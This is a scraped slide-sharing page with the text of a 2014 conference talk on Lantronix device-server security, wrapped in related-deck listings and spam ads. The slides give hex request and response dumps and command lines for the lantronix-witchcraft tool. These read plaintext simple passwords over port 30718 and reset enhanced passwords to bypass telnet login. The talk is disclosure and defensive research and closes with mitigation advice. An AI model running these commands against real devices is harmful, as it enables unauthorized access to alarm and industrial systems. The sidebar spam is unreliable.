Men & Women Top 5 Trends for Your Sartorial WardrobeMen & Women Top 5 Trends for Your Sartorial Wardrobe
Men & Women Top 5 Trends for Your Sartorial Wardrobe
 
Top Tips to enhance your Wardrobe
Top Tips to enhance your WardrobeTop Tips to enhance your Wardrobe
Top Tips to enhance your Wardrobe
 
PLNOG15: Network Migration and Service Assurance using Smart SFP Modules - To...
PLNOG15: Network Migration and Service Assurance using Smart SFP Modules - To...PLNOG15: Network Migration and Service Assurance using Smart SFP Modules - To...
PLNOG15: Network Migration and Service Assurance using Smart SFP Modules - To...
 

Similar a CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbgArno Huetter
 
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacketCsw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacketCanSecWest
 
OSNoise Tracer: Who Is Stealing My CPU Time?
OSNoise Tracer: Who Is Stealing My CPU Time?OSNoise Tracer: Who Is Stealing My CPU Time?
OSNoise Tracer: Who Is Stealing My CPU Time?ScyllaDB
 
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON
 
Profiling Oracle with GDB
Profiling Oracle with GDBProfiling Oracle with GDB
Profiling Oracle with GDBEnkitec
 
LT SAP HANAネットワークプロトコル初段
LT SAP HANAネットワークプロトコル初段LT SAP HANAネットワークプロトコル初段
LT SAP HANAネットワークプロトコル初段Koji Shinkubo
 
SSD & HDD Performance Testing with TKperf
SSD & HDD Performance Testing with TKperfSSD & HDD Performance Testing with TKperf
SSD & HDD Performance Testing with TKperfWerner Fischer
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Manich Koomsusi
 
Understanding Performance with DTrace
Understanding Performance with DTraceUnderstanding Performance with DTrace
Understanding Performance with DTraceahl0003
 
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'Positive Hack Days
 
Monitoring Containers with Weave Scope
Monitoring Containers with Weave ScopeMonitoring Containers with Weave Scope
Monitoring Containers with Weave ScopeWeaveworks
 
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"Yulia Tsisyk
 
Networking in depth
Networking in depthNetworking in depth
Networking in depthRiadh Briki
 
Real life test; real life situations
Real life test; real life situationsReal life test; real life situations
Real life test; real life situationsAndre Verschelling
 
TestowanieIoT2016
TestowanieIoT2016TestowanieIoT2016
TestowanieIoT2016kraqa
 

Similar a CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh (20)

Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbg
 
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacketCsw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
 
OSNoise Tracer: Who Is Stealing My CPU Time?
OSNoise Tracer: Who Is Stealing My CPU Time?OSNoise Tracer: Who Is Stealing My CPU Time?
OSNoise Tracer: Who Is Stealing My CPU Time?
 
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
 
Profiling Oracle with GDB
Profiling Oracle with GDBProfiling Oracle with GDB
Profiling Oracle with GDB
 
crack satellite
crack satellite crack satellite
crack satellite
 
LT SAP HANAネットワークプロトコル初段
LT SAP HANAネットワークプロトコル初段LT SAP HANAネットワークプロトコル初段
LT SAP HANAネットワークプロトコル初段
 
02-11-2005.ppt
02-11-2005.ppt02-11-2005.ppt
02-11-2005.ppt
 
SSD & HDD Performance Testing with TKperf
SSD & HDD Performance Testing with TKperfSSD & HDD Performance Testing with TKperf
SSD & HDD Performance Testing with TKperf
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017
 
Understanding Performance with DTrace
Understanding Performance with DTraceUnderstanding Performance with DTrace
Understanding Performance with DTrace
 
No more dumb hex!
No more dumb hex!No more dumb hex!
No more dumb hex!
 
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'
 
Monitoring Containers with Weave Scope
Monitoring Containers with Weave ScopeMonitoring Containers with Weave Scope
Monitoring Containers with Weave Scope
 
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
 
eel6935_ch2.pdf
eel6935_ch2.pdfeel6935_ch2.pdf
eel6935_ch2.pdf
 
Inside Winnyp
Inside WinnypInside Winnyp
Inside Winnyp
 
Networking in depth
Networking in depthNetworking in depth
Networking in depth
 
Real life test; real life situations
Real life test; real life situationsReal life test; real life situations
Real life test; real life situations
 
TestowanieIoT2016
TestowanieIoT2016TestowanieIoT2016
TestowanieIoT2016
 

Último

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 

Último (20)

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 

CONFidence 2014: Vlatko Kosturjak: Exploring treasures of 77FEh

  • 1. 1 Mos Eisley Lab Confidence 2014 Exploring treasures of 77FEh Getting access to Lantronix devices Vlatko Kosturjak, Diverto @k0st
  • 2. 2 Mos Eisley Lab Who are you!?!!?? ● Security Jedi at Diverto – Bringing balance to the force ● Experience – Offensive (Penetration tester) – Defensive (Developer/System Administrator/...) – Have code in: Nmap, Metasploit, OpenVAS, … – Author of free software: https://github.com/kost/ ● If you trust in certificates – CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...
  • 3. 3 Mos Eisley Lab Agenda ● Introduction - Lantronix ● Physical access ● WTF is 77FEh? ● Vulnerabilities & Exploitation ● Recommendations ● Questions and answers 45 minutes
  • 5. 5 Mos Eisley Lab You can find them as integral part of ● Alarms ● HVACs ● Pool monitoring systems ● Sprinkler controllers ● Hacked vacuum cleaners - Roombas ● Embedded systems ● Industrial systems Source: http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsA
  • 6. 6 Mos Eisley Lab What they are running actually? ● OS – CoBos (mostly) – Evolution OS/Linux – ThreadX – Linux ● Support – 1 or more serial ports – Modbus (few models) – 10/100 Ethernet
  • 7. 7 Mos Eisley Lab Physical access ● Like usual – Game over ● Serial access – No password by design ● Requirements – Standard TTL cable – BusPirate – ...
  • 8. 8 Mos Eisley Lab Connecting to serial port... ● 9600 bps 8/N/1 ● Flow control: None
  • 9. 9 Mos Eisley Lab Most frequent services Available – TCP/IP ● Web (tcp/80) ● Telnet (tcp/9999) ● 77FEh (tcp-udp/30718) ● SNMP (udp/161) Telnet administration interface What is this? Mostly information disclosures Simple web server Serving applet JAR which talks to 30718 port
  • 10. 10 Mos Eisley Lab Device Discovery ● Ask :) ● Look if you have physical access ● Passive ● Active/Scanning – Standard port scanning is fine with conservative timing – Broadcast UDP to specific Lantronix ports (30718) ● Beware – Version scanning(-sV) or running vulnerability scanners may misconfigure device –
  • 11. 11 Mos Eisley Lab Telnet administration $ telnet 192.168.1.101 9999 Trying 192.168.1.101... Connected to 192.168.1.101. Escape character is '^]'. MAC address DEADDEADDEAD Software version V5.8.8.3 (050801) XPTEXE AES library version 1.8.2.1 Password :
  • 12. 12 Mos Eisley Lab So, WTF is 77FEh finally? ● 0x77FE = 30718 (10) ● TCP/UDP protocol for device setup – Proprietary protocol – Used by DeviceInstaller (proprietary software from Lantronix) ● Designed for – Setup of device – Administration of device – Getting device info – Insecurity (sorry, had to write it, you'll see later ;) )
  • 13. 13 Mos Eisley Lab Sample 77FEh communication [v] Sending 4 bytes: 0x00000000 (00000) 000000f6 .... [v] Received 30 bytes: (00000) 000000f7 00108005 58324400 df0e0000 ........X2D..... (00016) 62a7d944 00000000 00204a91 84fb b..D..... J... ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip> Query setup request (4) Query setup response (4) MAC address of the device (6) Device type
  • 14. 14 Mos Eisley Lab Interesting request – #1 ● [v] Sending 4 bytes: ● 0x00000000 (00000) 000000f8 .... ● ● [v] Received 124 bytes: ● 0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST ● 0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L........... ● 0x00000020 (00032) cc070000 00000000 00000000 00000000 ................ ● 0x00000030 (00048) 00000000 00000000 00000000 00000000 ................ ● 0x00000040 (00064) 00000000 00000000 00000000 00000000 ................ ● 0x00000050 (00080) 00000000 00000000 00000000 00000000 ................ ● 0x00000060 (00096) 00000000 00000000 00000000 00000000 ................ ● 0x00000070 (00112) 00000000 00000000 00000000 ............ Query setup (4) Simple Password In Plaintext (4) ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P <ip> IPv4 (4)
  • 15. 15 Mos Eisley Lab Previous – work ● Metasploit – Rob Vinson ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne ● https://github.com/robvinson/metasploit-modules – Metasploit modules for simple passwords by jgor ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant ● Tools – Simple C program by jgor ● https://github.com/jgor/lantronix-telnet-pw
  • 16. 16 Mos Eisley Lab But... ● Simple password is not set ● Device still asks for password ● Further digging – Enhanced password in place – You cannot get/reset the enhanced password easily – Length is bigger (4->16) – Challenge!!!
  • 17. 17 Mos Eisley Lab Introduction to enhanced passwords Source: Lantronix documentation Feature/Type Simple Password Enhanced Password Length 4 16 Visible in query setup yes no
  • 19. 19 Mos Eisley Lab Interesting request - #2 [v] Sending 4 bytes: 0x00000000 (00000) 000000f4 .... [v] Received 32 bytes: 0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST 0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3......... 0x00000020 (00032) ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C <ip> Simple Password In Plaintext (4) Query ext version Request (4) Version (6)
  • 20. 20 Mos Eisley Lab Interesting request #3 ● Request to query configuration – 000000eX ● Response to query configuration – 000000bX + followed by 126 bytes of setup – ● X=number of setup records (0 – F): – 0 basic setup record ● Simple password, IP... – 1 security record ● Enhanced password, AES key, SNMP... – 2 specific products / situations – 3 OEMs – ... Wrong! Request for security record 1 provides just zero bytes! HALF
  • 21. 21 Mos Eisley Lab Interesting request #4 ● Request to change configuration – 000000cX + followed by 126 bytes of setup ● Response to change configuration – 000000bX – ● X=number of setup records (0 – F): – 0 basic setup record – 1 security record – 2 specific products / situations – 3 OEMs
  • 22. 22 Mos Eisley Lab Setting setup record 1 for security [v] Sending 130 bytes: 0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................ 0x00000010 (00016) 00000000 00000000 00000000 00000000 ................ 0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public.... 0x00000030 (00048) 00000000 00000000 00000000 00000000 ................ 0x00000040 (00064) 00000000 00000000 00000000 00000000 ................ 0x00000050 (00080) 00000000 00000000 00000000 00000000 ................ 0x00000060 (00096) 00000000 00000000 00000000 00000000 ................ 0x00000070 (00112) 00000000 00000000 00000000 00000000 ................ 0x00000080 (00128) 0000 .. [v] Received 4 bytes: 0x00000000 (00000) 000000b1 .... ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E <ip> Setting Setup record 1 Was successful Set Setup record 1 (security) request SNMP Community String (13) Enhanced Password (16)
  • 23. 23 Mos Eisley Lab Enhanced password gone no password to enter! $ telnet 192.168.1.101 9999 Trying 192.168.1.101... Connected to 192.168.1.101. Escape character is '^]'. MAC address DEADDEADDEAD Software version V5.8.8.3 (050801) XPTEXE AES library version 1.8.2.1 Press Enter for Setup Mode
  • 24. 24 Mos Eisley Lab Authentication Algorithm Guess Authenticate Enhanced Password Simple Password Enhanced Not set Ask for enhanced Ask for simple Display setup menu Enhanced set Simple set Simple Not set Password OK
  • 25. 25 Mos Eisley Lab New tool: lantronix-witchcraft ● 77FEh protocol implementation ● 77FEh security related utility ● All the tricks mentioned implemented ● Free software: GPL2 ● Requirement: Perl ● Available at – https://github.com/kost/lantronix-witchcraft
  • 26. 26 Mos Eisley Lab Basic usage: ● Display Mac address: – ./lantronix-witchcraft.pl -Q <ip> ● Display Simple Password (up to 4 characters) – ./lantronix-witchcraft.pl -P <ip> ● Reset Security record (together with enhanced password) – ./lantronix-witchcraft.pl -E <ip> ● Reset Security record without AES (with enhanced password) – ./lantronix-witchcraft.pl -S <ip> ● Dump setup records – ./lantronix-witchcraft.pl -G -D <ip>
  • 27. 27 Mos Eisley Lab Brave enough? ● One command to rule them all ● Display Mac address and simple password, dump setup records, reset security records together with enhanced password: – – ./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip> ●
  • 28. 28 Mos Eisley Lab Still wondering why automatic scanning is bad for Lantronix? ● ● Dump of setup record: 00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y| 00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0| 00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{| 00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0| 00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|
  • 29. 29 Mos Eisley Lab Correct way ● Ask – Someone responsible if they could have something like that ● Send broadcast query packet to 77FEh ● Identify ports 30718 open (TCP or UDP) ● Dump setup records ● Play ;) ● Check if it is still working... – If yes, perfect – If not: huh, but you should restore setup records somehow ;)
  • 30. 30 Mos Eisley Lab It's not about Lantronix... ● ...they warned the vendors about it in their documentation Source: Lantronix documentation
  • 31. 31 Mos Eisley Lab Disclosure Problem ● It's more about vendors who implement Lantronix in their devices ● Whom to report? – Lantronix – I guess they know their protocol ;) – OEMs – hard to find all their customers ;) ● Awareness – Conference – Tools
  • 32. 32 Mos Eisley Lab But maybe it could be done... ● Add white list ● Encryption/SSL? Source: Lantronix documentation
  • 33. 33 Mos Eisley Lab Recommendations ● Have some other device to VPN/SSL tunnel the services ● Telnet only through VPN or other secure channel to administration interface ● Disable 77FEh if not needed ● Filter out 77FEh on network devices to only allowed ones ● Disable other unneccesary services (SNMP, telnet, etc).
  • 35. 35 Mos Eisley Lab Summary ● There are ways to pass beyond authentication (if 77FEh is enabled) – Simple passwords – Enhanced passwords ● Tools – Metasploit Lantronix modules – https://github.com/kost/lantronix-witchcraft ● Recommendations – Disable 77FEh if not needed or Filter out 77FEh on network devices to only allowed ones – Tunnel VPN/SSL all communication to these devices ● Future – There are things to research: way to obtain enhanced password or AES keys for example
  • 36. 36 Mos Eisley Lab Acknowledgements - Thanks ● Previous work (Simple Passwords) – Rob Vinson ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne ● https://github.com/robvinson/metasploit-modules – Metasploit modules for simple passwords by jgor ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan ● https://github.com/jgor/lantronix-telnet-pw ● Colleagues – Dalibor Dosegović, hardware wizard